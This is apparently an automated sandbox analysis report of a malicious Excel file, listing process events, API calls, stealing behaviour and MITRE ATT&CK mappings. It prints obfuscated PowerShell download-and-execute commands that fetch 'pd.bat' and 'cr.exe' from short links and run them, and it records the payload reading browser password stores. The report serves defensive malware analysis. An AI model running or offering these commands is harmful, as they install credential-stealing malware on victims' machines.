      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2924Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2844Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3052Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2960Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3044Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2480Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043DCD2 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0045F42D FindFirstFileExW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043DCF2 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043DE3D GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002AE08D GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002CF67D FindFirstFileExW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002ADF22 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002ADF42 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00434AFC __EH_prolog,GetLogicalDriveStringsA,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004365E1 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: powershell.exe, 0000000E.00000002.2143327246.000000000035B000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00446061 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00423778 GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0044663D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00459A7D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00459A39 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00459AAE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00220083 push dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002B688D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0027092B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002C9C89 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002C9CFE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002C9CCD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00270D90 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00409290 __EH_prolog,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043FFB9 SetUnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00446061 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0044017B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043FE57 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002B00A7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002B62B1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002B03CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 18,1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\cr.exe 'C:\Users\user\AppData\Roaming\cr.exe'

      Language, Device and Operating System Detection:

      barindex
      Yara detected Obfuscated PowershellShow sources
      Source: Yara matchFile source: dump.pcap, type: PCAP
      Source: Yara matchFile source: C:\Users\user\Documents\pd.bat, type: DROPPED
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043FC7B cpuid
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,GetUserNameA,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,WaitForSingleObject,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: EnumSystemLocalesW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: EnumSystemLocalesW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: EnumSystemLocalesW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: EnumSystemLocalesW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: EnumSystemLocalesW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: EnumSystemLocalesW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: EnumSystemLocalesW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: EnumSystemLocalesW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00440023 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00434BE4 GetUserNameA,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043604A __EH_prolog,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00423778 GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary,
      Source: C:\Users\user\AppData\Roaming\cr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 BlobJump to behavior

      Stealing of Sensitive Information:

      barindex
      Contains functionality to steal Internet Explorer form passwordsShow sources
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
      Tries to harvest and steal browser information (history, passwords, etc)Show sources
      Source: C:\Users\user\AppData\Roaming\cr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Source: C:\Users\user\AppData\Roaming\cr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Windows\System32\attrib.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Windows\System32\attrib.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Windows\System32\cmd.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Windows\System32\cmd.exeDirectory queried: C:\Users\user\Documents

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsScripting311Application Shimming1Application Shimming1Disable or Modify Tools11OS Credential Dumping2System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection11Deobfuscate/Decode Files or Information11Credentials In Files1Account Discovery1Remote Desktop ProtocolData from Local System11Exfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Scripting311Security Account ManagerFile and Directory Discovery14SMB/Windows Admin SharesScreen Capture1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsCommand and Scripting Interpreter13Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information21NTDSSystem Information Discovery36Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
      Cloud AccountsPowerShell2Network Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsSecurity Software Discovery221VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion2DCSyncVirtualization/Sandbox Evasion2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection11Proc FilesystemProcess Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 337274 Sample: ul9kpUwYel.xls Startdate: 08/01/2021 Architecture: WINDOWS Score: 100 68 trashbininspector.fun 2->68 80 Multi AV Scanner detection for domain / URL 2->80 82 Malicious sample detected (through community Yara rule) 2->82 84 Antivirus detection for URL or domain 2->84 86 10 other signatures 2->86 12 EXCEL.EXE 86 29 2->12         started        signatures3 process4 signatures5 102 Obfuscated command line found 12->102 104 Document exploit detected (process start blacklist hit) 12->104 15 cmd.exe 12->15         started        17 cmd.exe 12->17         started        20 cmd.exe 12->20         started        22 2 other processes 12->22 process6 signatures7 24 powershell.exe 7 15->24         started        78 Obfuscated command line found 17->78 26 powershell.exe 16 10 17->26         started        30 powershell.exe 6 20->30         started        33 powershell.exe 7 22->33         started        35 powershell.exe 7 22->35         started        process8 dnsIp9 37 cmd.exe 24->37         started        74 cutt.ly 104.22.1.232, 443, 49165, 49168 CLOUDFLARENETUS United States 26->74 76 37.46.150.139, 49167, 80 IWAYCH Moldova Republic of 26->76 62 C:\Users\user\Documents\pd.bat, ASCII 26->62 dropped 106 Powershell drops PE file 30->106 40 attrib.exe 33->40         started        file10 signatures11 process12 signatures13 88 Obfuscated command line found 